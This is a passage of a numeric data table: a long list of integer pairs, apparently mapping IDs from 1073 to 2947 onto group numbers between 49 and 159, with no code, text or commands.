(1073, 49),
(1074, 49),
(1075, 50),
(1076, 50),
(1077, 50),
(1078, 50),
(1079, 50),
(1080, 50),
(1081, 50),
(1082, 50),
(1083, 50),
(1084, 50),
(1085, 50),
(1086, 50),
(1087, 50),
(1088, 50),
(1089, 50),
(1090, 50),
(1091, 50),
(1092, 50),
(1093, 50),
(1094, 50),
(1095, 51),
(1096, 51),
(1097, 51),
(1098, 51),
(1099, 51),
(1100, 51),
(1101, 51),
(1102, 51),
(1103, 51),
(1104, 51),
(1105, 51),
(1106, 51),
(1107, 51),
(1108, 51),
(1109, 51),
(1110, 51),
(1111, 51),
(1112, 51),
(1113, 51),
(1114, 51),
(1115, 52),
(1116, 52),
(1117, 52),
(1118, 52),
(1119, 52),
(1120, 52),
(1121, 52),
(1122, 52),
(1123, 52),
(1124, 52),
(1125, 52),
(1126, 52),
(1127, 52),
(1128, 52),
(1129, 52),
(1130, 52),
(1131, 53),
(1132, 53),
(1133, 53),
(1134, 53),
(1135, 53),
(1136, 53),
(1137, 53),
(1138, 53),
(1139, 53),
(1140, 53),
(1141, 53),
(1142, 53),
(1143, 53),
(1144, 53),
(1145, 53),
(1146, 53),
(1147, 53),
(1148, 53),
(1149, 53),
(1150, 53),
(1151, 53),
(1152, 53),
(1153, 54),
(1154, 54),
(1155, 54),
(1156, 54),
(1157, 54),
(1158, 54),
(1159, 54),
(1160, 54),
(1161, 54),
(1162, 54),
(1163, 54),
(1164, 54),
(1165, 54),
(1166, 54),
(1167, 54),
(1168, 54),
(1169, 54),
(1170, 54),
(1171, 54),
(1172, 54),
(1173, 54),
(1174, 54),
(1175, 55),
(1176, 55),
(1177, 55),
(1178, 55),
(1179, 55),
(1180, 55),
(1181, 55),
(1182, 55),
(1183, 55),
(1184, 55),
(1185, 55),
(1186, 55),
(1187, 55),
(1188, 55),
(1189, 55),
(1190, 55),
(1191, 55),
(1192, 55),
(1193, 55),
(1194, 55),
(1195, 55),
(1196, 55),
(1197, 56),
(1198, 56),
(1199, 56),
(1200, 56),
(1201, 56),
(1202, 56),
(1203, 56),
(1204, 56),
(1205, 56),
(1206, 56),
(1207, 56),
(1208, 56),
(1209, 56),
(1210, 56),
(1211, 56),
(1212, 56),
(1213, 56),
(1214, 56),
(1215, 56),
(1216, 56),
(1217, 56),
(1218, 56),
(1219, 57),
(1220, 57),
(1221, 57),
(1222, 57),
(1223, 57),
(1224, 57),
(1225, 57),
(1226, 57),
(1227, 57),
(1228, 57),
(1229, 57),
(1230, 57),
(1231, 57),
(1232, 57),
(1233, 57),
(1234, 57),
(1235, 57),
(1236, 57),
(1237, 57),
(1238, 57),
(1239, 57),
(1240, 57),
(1241, 58),
(1242, 58),
(1243, 58),
(1244, 58),
(1245, 58),
(1246, 58),
(1247, 58),
(1248, 58),
(1249, 58),
(1250, 58),
(1251, 58),
(1252, 58),
(1253, 58),
(1254, 58),
(1255, 58),
(1256, 58),
(1257, 58),
(1258, 58),
(1259, 58),
(1260, 58),
(1261, 58),
(1262, 58),
(1263, 59),
(1264, 59),
(1265, 59),
(1266, 59),
(1267, 59),
(1268, 59),
(1269, 59),
(1270, 59),
(1271, 59),
(1272, 59),
(1273, 59),
(1274, 59),
(1275, 59),
(1276, 59),
(1277, 59),
(1278, 59),
(1279, 59),
(1280, 59),
(1281, 59),
(1282, 59),
(1283, 59),
(1284, 59),
(1285, 59),
(1286, 60),
(1287, 61),
(1288, 62),
(1289, 63),
(1290, 64),
(1291, 65),
(1292, 66),
(1293, 67),
(1294, 68),
(1295, 69),
(1296, 70),
(1297, 71),
(1298, 72),
(1299, 73),
(1300, 74),
(1301, 75),
(1302, 76),
(1303, 77),
(1304, 78),
(1305, 79),
(1306, 80),
(1307, 81),
(1308, 82),
(1309, 83),
(1310, 84),
(1311, 85),
(1312, 86),
(1313, 87),
(1314, 88),
(1315, 89),
(1316, 90),
(1317, 91),
(1318, 92),
(1319, 93),
(1320, 94),
(1321, 95),
(1322, 96),
(1323, 97),
(1324, 98),
(1325, 99),
(1326, 100),
(1327, 101),
(1328, 102),
(1329, 103),
(1330, 104),
(1331, 105),
(1332, 106),
(1333, 107),
(1334, 108),
(1335, 109),
(1336, 110),
(1337, 111),
(1338, 112),
(1339, 113),
(1340, 114),
(1341, 115),
(1342, 116),
(1343, 117),
(1344, 118),
(1345, 119),
(1346, 120),
(1347, 121),
(1348, 122),
(1349, 123),
(1350, 124),
(1351, 125),
(1352, 126),
(1353, 127),
(1354, 128),
(1355, 129),
(1356, 130),
(1357, 131),
(1358, 132),
(1359, 133),
(1360, 134),
(1361, 135),
(1362, 136),
(1363, 137),
(1364, 138),
(1365, 139),
(1366, 140),
(1367, 141),
(1368, 142),
(1369, 143),
(1370, 144),
(1371, 145),
(1372, 146),
(1373, 147),
(1374, 148),
(1375, 149),
(1376, 150),
(1377, 151),
(1378, 152),
(1379, 153),
(1380, 154),
(1381, 155),
(1382, 156),
(1383, 157),
(1384, 158),
(1385, 159),
(1386, 60),
(1387, 61),
(1388, 61),
(1389, 61),
(1390, 62),
(1391, 63),
(1392, 64),
(1393, 64),
(1394, 64),
(1395, 65),
(1396, 66),
(1397, 67),
(1398, 67),
(1399, 67),
(1400, 68),
(1401, 69),
(1402, 70),
(1403, 70),
(1404, 70),
(1405, 71),
(1406, 72),
(1407, 73),
(1408, 73),
(1409, 73),
(1410, 74),
(1411, 75),
(1412, 75),
(1413, 75),
(1414, 76),
(1415, 76),
(1416, 76),
(1417, 77),
(1418, 78),
(1419, 79),
(1420, 79),
(1421, 79),
(1422, 80),
(1423, 81),
(1424, 82),
(1425, 82),
(1426, 82),
(1427, 83),
(1428, 84),
(1429, 85),
(1430, 85),
(1431, 85),
(1432, 86),
(1433, 87),
(1434, 88),
(1435, 88),
(1436, 88),
(1437, 89),
(1438, 90),
(1439, 91),
(1440, 91),
(1441, 91),
(1442, 92),
(1443, 92),
(1444, 92),
(1445, 93),
(1446, 94),
(1447, 95),
(1448, 95),
(1449, 95),
(1450, 96),
(1451, 97),
(1452, 98),
(1453, 98),
(1454, 98),
(1455, 99),
(1456, 100),
(1457, 101),
(1458, 101),
(1459, 101),
(1460, 102),
(1461, 103),
(1462, 104),
(1463, 104),
(1464, 104),
(1465, 105),
(1466, 106),
(1467, 107),
(1468, 107),
(1469, 107),
(1470, 108),
(1471, 108),
(1472, 108),
(1473, 109),
(1474, 110),
(1475, 111),
(1476, 111),
(1477, 111),
(1478, 112),
(1479, 113),
(1480, 114),
(1481, 114),
(1482, 114),
(1483, 115),
(1484, 116),
(1485, 117),
(1486, 117),
(1487, 117),
(1488, 118),
(1489, 119),
(1490, 120),
(1491, 120),
(1492, 120),
(1493, 121),
(1494, 122),
(1495, 123),
(1496, 123),
(1497, 123),
(1498, 124),
(1499, 125),
(1500, 126),
(1501, 126),
(1502, 126),
(1503, 127),
(1504, 128),
(1505, 129),
(1506, 129),
(1507, 129),
(1508, 130),
(1509, 131),
(1510, 132),
(1511, 132),
(1512, 132),
(1513, 133),
(1514, 134),
(1515, 135),
(1516, 135),
(1517, 135),
(1518, 136),
(1519, 137),
(1520, 138),
(1521, 138),
(1522, 138),
(1523, 139),
(1524, 139),
(1525, 139),
(1526, 140),
(1527, 141),
(1528, 141),
(1529, 141),
(1530, 142),
(1531, 143),
(1532, 144),
(1533, 144),
(1534, 144),
(1535, 145),
(1536, 146),
(1537, 147),
(1538, 147),
(1539, 147),
(1540, 148),
(1541, 149),
(1542, 150),
(1543, 150),
(1544, 150),
(1545, 151),
(1546, 152),
(1547, 153),
(1548, 153),
(1549, 153),
(1550, 154),
(1551, 155),
(1552, 155),
(1553, 155),
(1554, 156),
(1555, 157),
(1556, 157),
(1557, 157),
(1558, 158),
(1559, 159),
(1560, 60),
(1561, 60),
(1562, 60),
(1563, 60),
(1564, 60),
(1565, 60),
(1566, 60),
(1567, 61),
(1568, 61),
(1569, 61),
(1570, 61),
(1571, 61),
(1572, 61),
(1573, 61),
(1574, 62),
(1575, 62),
(1576, 62),
(1577, 62),
(1578, 62),
(1579, 62),
(1580, 62),
(1581, 63),
(1582, 63),
(1583, 63),
(1584, 63),
(1585, 63),
(1586, 63),
(1587, 63),
(1588, 64),
(1589, 64),
(1590, 64),
(1591, 64),
(1592, 64),
(1593, 64),
(1594, 64),
(1595, 65),
(1596, 65),
(1597, 65),
(1598, 65),
(1599, 65),
(1600, 65),
(1601, 65),
(1602, 66),
(1603, 66),
(1604, 66),
(1605, 66),
(1606, 66),
(1607, 66),
(1608, 66),
(1609, 67),
(1610, 67),
(1611, 67),
(1612, 67),
(1613, 67),
(1614, 67),
(1615, 67),
(1616, 68),
(1617, 68),
(1618, 68),
(1619, 68),
(1620, 68),
(1621, 68),
(1622, 68),
(1623, 69),
(1624, 69),
(1625, 69),
(1626, 69),
(1627, 69),
(1628, 69),
(1629, 69),
(1630, 70),
(1631, 70),
(1632, 70),
(1633, 70),
(1634, 70),
(1635, 70),
(1636, 70),
(1637, 71),
(1638, 71),
(1639, 71),
(1640, 71),
(1641, 71),
(1642, 71),
(1643, 71),
(1644, 72),
(1645, 72),
(1646, 72),
(1647, 72),
(1648, 72),
(1649, 72),
(1650, 72),
(1651, 73),
(1652, 73),
(1653, 73),
(1654, 73),
(1655, 73),
(1656, 73),
(1657, 73),
(1658, 74),
(1659, 74),
(1660, 74),
(1661, 74),
(1662, 74),
(1663, 74),
(1664, 74),
(1665, 75),
(1666, 75),
(1667, 75),
(1668, 75),
(1669, 75),
(1670, 75),
(1671, 75),
(1672, 75),
(1673, 75),
(1674, 75),
(1675, 76),
(1676, 76),
(1677, 76),
(1678, 76),
(1679, 76),
(1680, 76),
(1681, 76),
(1682, 77),
(1683, 77),
(1684, 77),
(1685, 77),
(1686, 77),
(1687, 77),
(1688, 77),
(1689, 78),
(1690, 78),
(1691, 78),
(1692, 78),
(1693, 78),
(1694, 78),
(1695, 78),
(1696, 79),
(1697, 79),
(1698, 79),
(1699, 79),
(1700, 79),
(1701, 79),
(1702, 79),
(1703, 80),
(1704, 80),
(1705, 80),
(1706, 80),
(1707, 80),
(1708, 80),
(1709, 80),
(1710, 81),
(1711, 81),
(1712, 81),
(1713, 81),
(1714, 81),
(1715, 81),
(1716, 81),
(1717, 82),
(1718, 82),
(1719, 82),
(1720, 82),
(1721, 82),
(1722, 82),
(1723, 82),
(1724, 83),
(1725, 83),
(1726, 83),
(1727, 83),
(1728, 83),
(1729, 83),
(1730, 83),
(1731, 84),
(1732, 84),
(1733, 84),
(1734, 84),
(1735, 84),
(1736, 84),
(1737, 84),
(1738, 85),
(1739, 85),
(1740, 85),
(1741, 85),
(1742, 85),
(1743, 85),
(1744, 85),
(1745, 86),
(1746, 86),
(1747, 86),
(1748, 86),
(1749, 86),
(1750, 86),
(1751, 86),
(1752, 87),
(1753, 87),
(1754, 87),
(1755, 87),
(1756, 87),
(1757, 87),
(1758, 87),
(1759, 88),
(1760, 88),
(1761, 88),
(1762, 88),
(1763, 88),
(1764, 88),
(1765, 88),
(1766, 89),
(1767, 89),
(1768, 89),
(1769, 89),
(1770, 89),
(1771, 89),
(1772, 89),
(1773, 90),
(1774, 90),
(1775, 90),
(1776, 90),
(1777, 90),
(1778, 90),
(1779, 90),
(1780, 91),
(1781, 91),
(1782, 91),
(1783, 91),
(1784, 91),
(1785, 91),
(1786, 91),
(1787, 91),
(1788, 91),
(1789, 91),
(1790, 92),
(1791, 92),
(1792, 92),
(1793, 92),
(1794, 92),
(1795, 92),
(1796, 92),
(1797, 93),
(1798, 93),
(1799, 93),
(1800, 93),
(1801, 93),
(1802, 93),
(1803, 93),
(1804, 94),
(1805, 94),
(1806, 94),
(1807, 94),
(1808, 94),
(1809, 94),
(1810, 94),
(1811, 95),
(1812, 95),
(1813, 95),
(1814, 95),
(1815, 95),
(1816, 95),
(1817, 95),
(1818, 96),
(1819, 96),
(1820, 96),
(1821, 96),
(1822, 96),
(1823, 96),
(1824, 96),
(1825, 97),
(1826, 97),
(1827, 97),
(1828, 97),
(1829, 97),
(1830, 97),
(1831, 97),
(1832, 98),
(1833, 98),
(1834, 98),
(1835, 98),
(1836, 98),
(1837, 98),
(1838, 98),
(1839, 99),
(1840, 99),
(1841, 99),
(1842, 99),
(1843, 99),
(1844, 99),
(1845, 99),
(1846, 100),
(1847, 100),
(1848, 100),
(1849, 100),
(1850, 100),
(1851, 100),
(1852, 100),
(1853, 101),
(1854, 101),
(1855, 101),
(1856, 101),
(1857, 101),
(1858, 101),
(1859, 101),
(1860, 102),
(1861, 102),
(1862, 102),
(1863, 102),
(1864, 102),
(1865, 102),
(1866, 102),
(1867, 103),
(1868, 103),
(1869, 103),
(1870, 103),
(1871, 103),
(1872, 103),
(1873, 103),
(1874, 104),
(1875, 104),
(1876, 104),
(1877, 104),
(1878, 104),
(1879, 104),
(1880, 104),
(1881, 105),
(1882, 105),
(1883, 105),
(1884, 105),
(1885, 105),
(1886, 105),
(1887, 105),
(1888, 106),
(1889, 106),
(1890, 106),
(1891, 106),
(1892, 106),
(1893, 106),
(1894, 106),
(1895, 107),
(1896, 107),
(1897, 107),
(1898, 107),
(1899, 107),
(1900, 107),
(1901, 107),
(1902, 107),
(1903, 107),
(1904, 107),
(1905, 108),
(1906, 108),
(1907, 108),
(1908, 108),
(1909, 108),
(1910, 108),
(1911, 108),
(1912, 109),
(1913, 109),
(1914, 109),
(1915, 109),
(1916, 109),
(1917, 109),
(1918, 109),
(1919, 110),
(1920, 110),
(1921, 110),
(1922, 110),
(1923, 110),
(1924, 110),
(1925, 110),
(1926, 111),
(1927, 111),
(1928, 111),
(1929, 111),
(1930, 111),
(1931, 111),
(1932, 111),
(1933, 112),
(1934, 112),
(1935, 112),
(1936, 112),
(1937, 112),
(1938, 112),
(1939, 112),
(1940, 113),
(1941, 113),
(1942, 113),
(1943, 113),
(1944, 113),
(1945, 113),
(1946, 113),
(1947, 114),
(1948, 114),
(1949, 114),
(1950, 114),
(1951, 114),
(1952, 114),
(1953, 114),
(1954, 115),
(1955, 115),
(1956, 115),
(1957, 115),
(1958, 115),
(1959, 115),
(1960, 115),
(1961, 116),
(1962, 116),
(1963, 116),
(1964, 116),
(1965, 116),
(1966, 116),
(1967, 116),
(1968, 117),
(1969, 117),
(1970, 117),
(1971, 117),
(1972, 117),
(1973, 117),
(1974, 117),
(1975, 118),
(1976, 118),
(1977, 118),
(1978, 118),
(1979, 118),
(1980, 118),
(1981, 118),
(1982, 119),
(1983, 119),
(1984, 119),
(1985, 119),
(1986, 119),
(1987, 119),
(1988, 119),
(1989, 120),
(1990, 120),
(1991, 120),
(1992, 120),
(1993, 120),
(1994, 120),
(1995, 120),
(1996, 121),
(1997, 121),
(1998, 121),
(1999, 121),
(2000, 121),
(2001, 121),
(2002, 121),
(2003, 122),
(2004, 122),
(2005, 122),
(2006, 122),
(2007, 122),
(2008, 122),
(2009, 122),
(2010, 123),
(2011, 123),
(2012, 123),
(2013, 123),
(2014, 123),
(2015, 123),
(2016, 123),
(2017, 123),
(2018, 123),
(2019, 123),
(2020, 124),
(2021, 124),
(2022, 124),
(2023, 124),
(2024, 124),
(2025, 124),
(2026, 124),
(2027, 125),
(2028, 125),
(2029, 125),
(2030, 125),
(2031, 125),
(2032, 125),
(2033, 125),
(2034, 126),
(2035, 126),
(2036, 126),
(2037, 126),
(2038, 126),
(2039, 126),
(2040, 126),
(2041, 127),
(2042, 127),
(2043, 127),
(2044, 127),
(2045, 127),
(2046, 127),
(2047, 127),
(2048, 128),
(2049, 128),
(2050, 128),
(2051, 128),
(2052, 128),
(2053, 128),
(2054, 128),
(2055, 129),
(2056, 129),
(2057, 129),
(2058, 129),
(2059, 129),
(2060, 129),
(2061, 129),
(2062, 130),
(2063, 130),
(2064, 130),
(2065, 130),
(2066, 130),
(2067, 130),
(2068, 130),
(2069, 131),
(2070, 131),
(2071, 131),
(2072, 131),
(2073, 131),
(2074, 131),
(2075, 131),
(2076, 132),
(2077, 132),
(2078, 132),
(2079, 132),
(2080, 132),
(2081, 132),
(2082, 132),
(2083, 133),
(2084, 133),
(2085, 133),
(2086, 133),
(2087, 133),
(2088, 133),
(2089, 133),
(2090, 134),
(2091, 134),
(2092, 134),
(2093, 134),
(2094, 134),
(2095, 134),
(2096, 134),
(2097, 135),
(2098, 135),
(2099, 135),
(2100, 135),
(2101, 135),
(2102, 135),
(2103, 135),
(2104, 136),
(2105, 136),
(2106, 136),
(2107, 136),
(2108, 136),
(2109, 136),
(2110, 136),
(2111, 137),
(2112, 137),
(2113, 137),
(2114, 137),
(2115, 137),
(2116, 137),
(2117, 137),
(2118, 138),
(2119, 138),
(2120, 138),
(2121, 138),
(2122, 138),
(2123, 138),
(2124, 138),
(2125, 139),
(2126, 139),
(2127, 139),
(2128, 139),
(2129, 139),
(2130, 139),
(2131, 139),
(2132, 139),
(2133, 139),
(2134, 139),
(2135, 140),
(2136, 140),
(2137, 140),
(2138, 140),
(2139, 140),
(2140, 140),
(2141, 140),
(2142, 141),
(2143, 141),
(2144, 141),
(2145, 141),
(2146, 141),
(2147, 141),
(2148, 141),
(2149, 142),
(2150, 142),
(2151, 142),
(2152, 142),
(2153, 142),
(2154, 142),
(2155, 142),
(2156, 143),
(2157, 143),
(2158, 143),
(2159, 143),
(2160, 143),
(2161, 143),
(2162, 143),
(2163, 144),
(2164, 144),
(2165, 144),
(2166, 144),
(2167, 144),
(2168, 144),
(2169, 144),
(2170, 145),
(2171, 145),
(2172, 145),
(2173, 145),
(2174, 145),
(2175, 145),
(2176, 145),
(2177, 146),
(2178, 146),
(2179, 146),
(2180, 146),
(2181, 146),
(2182, 146),
(2183, 146),
(2184, 147),
(2185, 147),
(2186, 147),
(2187, 147),
(2188, 147),
(2189, 147),
(2190, 147),
(2191, 148),
(2192, 148),
(2193, 148),
(2194, 148),
(2195, 148),
(2196, 148),
(2197, 148),
(2198, 149),
(2199, 149),
(2200, 149),
(2201, 149),
(2202, 149),
(2203, 149),
(2204, 149),
(2205, 150),
(2206, 150),
(2207, 150),
(2208, 150),
(2209, 150),
(2210, 150),
(2211, 150),
(2212, 151),
(2213, 151),
(2214, 151),
(2215, 151),
(2216, 151),
(2217, 151),
(2218, 151),
(2219, 152),
(2220, 152),
(2221, 152),
(2222, 152),
(2223, 152),
(2224, 152),
(2225, 152),
(2226, 153),
(2227, 153),
(2228, 153),
(2229, 153),
(2230, 153),
(2231, 153),
(2232, 153),
(2233, 154),
(2234, 154),
(2235, 154),
(2236, 154),
(2237, 154),
(2238, 154),
(2239, 154),
(2240, 155),
(2241, 155),
(2242, 155),
(2243, 155),
(2244, 155),
(2245, 155),
(2246, 155),
(2247, 155),
(2248, 155),
(2249, 155),
(2250, 156),
(2251, 156),
(2252, 156),
(2253, 156),
(2254, 156),
(2255, 156),
(2256, 156),
(2257, 157),
(2258, 157),
(2259, 157),
(2260, 157),
(2261, 157),
(2262, 157),
(2263, 157),
(2264, 158),
(2265, 158),
(2266, 158),
(2267, 158),
(2268, 158),
(2269, 158),
(2270, 158),
(2271, 159),
(2272, 159),
(2273, 159),
(2274, 159),
(2275, 159),
(2276, 159),
(2277, 159),
(2278, 60),
(2279, 61),
(2280, 62),
(2281, 63),
(2282, 64),
(2283, 65),
(2284, 66),
(2285, 67),
(2286, 68),
(2287, 69),
(2288, 70),
(2289, 71),
(2290, 72),
(2291, 73),
(2292, 74),
(2293, 75),
(2294, 76),
(2295, 77),
(2296, 78),
(2297, 79),
(2298, 80),
(2299, 81),
(2300, 82),
(2301, 83),
(2302, 84),
(2303, 85),
(2304, 86),
(2305, 87),
(2306, 88),
(2307, 89),
(2308, 90),
(2309, 91),
(2310, 92),
(2311, 93),
(2312, 94),
(2313, 95),
(2314, 96),
(2315, 97),
(2316, 98),
(2317, 99),
(2318, 100),
(2319, 101),
(2320, 102),
(2321, 103),
(2322, 104),
(2323, 105),
(2324, 106),
(2325, 107),
(2326, 108),
(2327, 109),
(2328, 110),
(2329, 111),
(2330, 112),
(2331, 113),
(2332, 114),
(2333, 115),
(2334, 116),
(2335, 117),
(2336, 118),
(2337, 119),
(2338, 120),
(2339, 121),
(2340, 122),
(2341, 123),
(2342, 124),
(2343, 125),
(2344, 126),
(2345, 127),
(2346, 128),
(2347, 129),
(2348, 130),
(2349, 131),
(2350, 132),
(2351, 133),
(2352, 134),
(2353, 135),
(2354, 136),
(2355, 137),
(2356, 138),
(2357, 139),
(2358, 140),
(2359, 141),
(2360, 142),
(2361, 143),
(2362, 144),
(2363, 145),
(2364, 146),
(2365, 147),
(2366, 148),
(2367, 149),
(2368, 150),
(2369, 151),
(2370, 152),
(2371, 153),
(2372, 154),
(2373, 155),
(2374, 156),
(2375, 157),
(2376, 158),
(2377, 159),
(2378, 60),
(2379, 60),
(2380, 60),
(2381, 60),
(2382, 60),
(2383, 60),
(2384, 61),
(2385, 61),
(2386, 61),
(2387, 61),
(2388, 61),
(2389, 61),
(2390, 62),
(2391, 62),
(2392, 62),
(2393, 62),
(2394, 62),
(2395, 62),
(2396, 63),
(2397, 63),
(2398, 63),
(2399, 63),
(2400, 63),
(2401, 63),
(2402, 64),
(2403, 64),
(2404, 64),
(2405, 64),
(2406, 64),
(2407, 64),
(2408, 65),
(2409, 65),
(2410, 65),
(2411, 65),
(2412, 65),
(2413, 65),
(2414, 66),
(2415, 66),
(2416, 66),
(2417, 66),
(2418, 66),
(2419, 66),
(2420, 67),
(2421, 67),
(2422, 67),
(2423, 67),
(2424, 67),
(2425, 67),
(2426, 68),
(2427, 68),
(2428, 68),
(2429, 68),
(2430, 68),
(2431, 68),
(2432, 69),
(2433, 69),
(2434, 69),
(2435, 69),
(2436, 69),
(2437, 69),
(2438, 70),
(2439, 70),
(2440, 70),
(2441, 70),
(2442, 70),
(2443, 70),
(2444, 71),
(2445, 71),
(2446, 71),
(2447, 71),
(2448, 71),
(2449, 71),
(2450, 72),
(2451, 72),
(2452, 72),
(2453, 72),
(2454, 72),
(2455, 72),
(2456, 73),
(2457, 73),
(2458, 73),
(2459, 73),
(2460, 73),
(2461, 73),
(2462, 74),
(2463, 74),
(2464, 74),
(2465, 74),
(2466, 74),
(2467, 74),
(2468, 75),
(2469, 75),
(2470, 75),
(2471, 75),
(2472, 75),
(2473, 75),
(2474, 75),
(2475, 75),
(2476, 75),
(2477, 76),
(2478, 76),
(2479, 76),
(2480, 76),
(2481, 76),
(2482, 76),
(2483, 77),
(2484, 77),
(2485, 77),
(2486, 77),
(2487, 77),
(2488, 77),
(2489, 78),
(2490, 78),
(2491, 78),
(2492, 78),
(2493, 78),
(2494, 78),
(2495, 79),
(2496, 79),
(2497, 79),
(2498, 79),
(2499, 79),
(2500, 79),
(2501, 80),
(2502, 80),
(2503, 80),
(2504, 80),
(2505, 80),
(2506, 80),
(2507, 81),
(2508, 81),
(2509, 81),
(2510, 81),
(2511, 81),
(2512, 81),
(2513, 82),
(2514, 82),
(2515, 82),
(2516, 82),
(2517, 82),
(2518, 82),
(2519, 83),
(2520, 83),
(2521, 83),
(2522, 83),
(2523, 83),
(2524, 83),
(2525, 84),
(2526, 84),
(2527, 84),
(2528, 84),
(2529, 84),
(2530, 84),
(2531, 85),
(2532, 85),
(2533, 85),
(2534, 85),
(2535, 85),
(2536, 85),
(2537, 86),
(2538, 86),
(2539, 86),
(2540, 86),
(2541, 86),
(2542, 86),
(2543, 87),
(2544, 87),
(2545, 87),
(2546, 87),
(2547, 87),
(2548, 87),
(2549, 88),
(2550, 88),
(2551, 88),
(2552, 88),
(2553, 88),
(2554, 88),
(2555, 89),
(2556, 89),
(2557, 89),
(2558, 89),
(2559, 89),
(2560, 89),
(2561, 90),
(2562, 90),
(2563, 90),
(2564, 90),
(2565, 90),
(2566, 90),
(2567, 91),
(2568, 91),
(2569, 91),
(2570, 91),
(2571, 91),
(2572, 91),
(2573, 91),
(2574, 91),
(2575, 91),
(2576, 92),
(2577, 92),
(2578, 92),
(2579, 92),
(2580, 92),
(2581, 92),
(2582, 93),
(2583, 93),
(2584, 93),
(2585, 93),
(2586, 93),
(2587, 93),
(2588, 94),
(2589, 94),
(2590, 94),
(2591, 94),
(2592, 94),
(2593, 94),
(2594, 95),
(2595, 95),
(2596, 95),
(2597, 95),
(2598, 95),
(2599, 95),
(2600, 96),
(2601, 96),
(2602, 96),
(2603, 96),
(2604, 96),
(2605, 96),
(2606, 97),
(2607, 97),
(2608, 97),
(2609, 97),
(2610, 97),
(2611, 97),
(2612, 98),
(2613, 98),
(2614, 98),
(2615, 98),
(2616, 98),
(2617, 98),
(2618, 99),
(2619, 99),
(2620, 99),
(2621, 99),
(2622, 99),
(2623, 99),
(2624, 100),
(2625, 100),
(2626, 100),
(2627, 100),
(2628, 100),
(2629, 100),
(2630, 101),
(2631, 101),
(2632, 101),
(2633, 101),
(2634, 101),
(2635, 101),
(2636, 102),
(2637, 102),
(2638, 102),
(2639, 102),
(2640, 102),
(2641, 102),
(2642, 103),
(2643, 103),
(2644, 103),
(2645, 103),
(2646, 103),
(2647, 103),
(2648, 104),
(2649, 104),
(2650, 104),
(2651, 104),
(2652, 104),
(2653, 104),
(2654, 105),
(2655, 105),
(2656, 105),
(2657, 105),
(2658, 105),
(2659, 105),
(2660, 106),
(2661, 106),
(2662, 106),
(2663, 106),
(2664, 106),
(2665, 106),
(2666, 107),
(2667, 107),
(2668, 107),
(2669, 107),
(2670, 107),
(2671, 107),
(2672, 107),
(2673, 107),
(2674, 107),
(2675, 108),
(2676, 108),
(2677, 108),
(2678, 108),
(2679, 108),
(2680, 108),
(2681, 109),
(2682, 109),
(2683, 109),
(2684, 109),
(2685, 109),
(2686, 109),
(2687, 110),
(2688, 110),
(2689, 110),
(2690, 110),
(2691, 110),
(2692, 110),
(2693, 111),
(2694, 111),
(2695, 111),
(2696, 111),
(2697, 111),
(2698, 111),
(2699, 112),
(2700, 112),
(2701, 112),
(2702, 112),
(2703, 112),
(2704, 112),
(2705, 113),
(2706, 113),
(2707, 113),
(2708, 113),
(2709, 113),
(2710, 113),
(2711, 114),
(2712, 114),
(2713, 114),
(2714, 114),
(2715, 114),
(2716, 114),
(2717, 115),
(2718, 115),
(2719, 115),
(2720, 115),
(2721, 115),
(2722, 115),
(2723, 116),
(2724, 116),
(2725, 116),
(2726, 116),
(2727, 116),
(2728, 116),
(2729, 117),
(2730, 117),
(2731, 117),
(2732, 117),
(2733, 117),
(2734, 117),
(2735, 118),
(2736, 118),
(2737, 118),
(2738, 118),
(2739, 118),
(2740, 118),
(2741, 119),
(2742, 119),
(2743, 119),
(2744, 119),
(2745, 119),
(2746, 119),
(2747, 120),
(2748, 120),
(2749, 120),
(2750, 120),
(2751, 120),
(2752, 120),
(2753, 121),
(2754, 121),
(2755, 121),
(2756, 121),
(2757, 121),
(2758, 121),
(2759, 122),
(2760, 122),
(2761, 122),
(2762, 122),
(2763, 122),
(2764, 122),
(2765, 123),
(2766, 123),
(2767, 123),
(2768, 123),
(2769, 123),
(2770, 123),
(2771, 123),
(2772, 123),
(2773, 123),
(2774, 124),
(2775, 124),
(2776, 124),
(2777, 124),
(2778, 124),
(2779, 124),
(2780, 125),
(2781, 125),
(2782, 125),
(2783, 125),
(2784, 125),
(2785, 125),
(2786, 126),
(2787, 126),
(2788, 126),
(2789, 126),
(2790, 126),
(2791, 126),
(2792, 127),
(2793, 127),
(2794, 127),
(2795, 127),
(2796, 127),
(2797, 127),
(2798, 128),
(2799, 128),
(2800, 128),
(2801, 128),
(2802, 128),
(2803, 128),
(2804, 129),
(2805, 129),
(2806, 129),
(2807, 129),
(2808, 129),
(2809, 129),
(2810, 130),
(2811, 130),
(2812, 130),
(2813, 130),
(2814, 130),
(2815, 130),
(2816, 131),
(2817, 131),
(2818, 131),
(2819, 131),
(2820, 131),
(2821, 131),
(2822, 132),
(2823, 132),
(2824, 132),
(2825, 132),
(2826, 132),
(2827, 132),
(2828, 133),
(2829, 133),
(2830, 133),
(2831, 133),
(2832, 133),
(2833, 133),
(2834, 134),
(2835, 134),
(2836, 134),
(2837, 134),
(2838, 134),
(2839, 134),
(2840, 135),
(2841, 135),
(2842, 135),
(2843, 135),
(2844, 135),
(2845, 135),
(2846, 136),
(2847, 136),
(2848, 136),
(2849, 136),
(2850, 136),
(2851, 136),
(2852, 137),
(2853, 137),
(2854, 137),
(2855, 137),
(2856, 137),
(2857, 137),
(2858, 138),
(2859, 138),
(2860, 138),
(2861, 138),
(2862, 138),
(2863, 138),
(2864, 139),
(2865, 139),
(2866, 139),
(2867, 139),
(2868, 139),
(2869, 139),
(2870, 139),
(2871, 139),
(2872, 139),
(2873, 140),
(2874, 140),
(2875, 140),
(2876, 140),
(2877, 140),
(2878, 140),
(2879, 141),
(2880, 141),
(2881, 141),
(2882, 141),
(2883, 141),
(2884, 141),
(2885, 142),
(2886, 142),
(2887, 142),
(2888, 142),
(2889, 142),
(2890, 142),
(2891, 143),
(2892, 143),
(2893, 143),
(2894, 143),
(2895, 143),
(2896, 143),
(2897, 144),
(2898, 144),
(2899, 144),
(2900, 144),
(2901, 144),
(2902, 144),
(2903, 145),
(2904, 145),
(2905, 145),
(2906, 145),
(2907, 145),
(2908, 145),
(2909, 146),
(2910, 146),
(2911, 146),
(2912, 146),
(2913, 146),
(2914, 146),
(2915, 147),
(2916, 147),
(2917, 147),
(2918, 147),
(2919, 147),
(2920, 147),
(2921, 148),
(2922, 148),
(2923, 148),
(2924, 148),
(2925, 148),
(2926, 148),
(2927, 149),
(2928, 149),
(2929, 149),
(2930, 149),
(2931, 149),
(2932, 149),
(2933, 150),
(2934, 150),
(2935, 150),
(2936, 150),
(2937, 150),
(2938, 150),
(2939, 151),
(2940, 151),
(2941, 151),
(2942, 151),
(2943, 151),
(2944, 151),
(2945, 152),
(2946, 152),
(2947, 152),
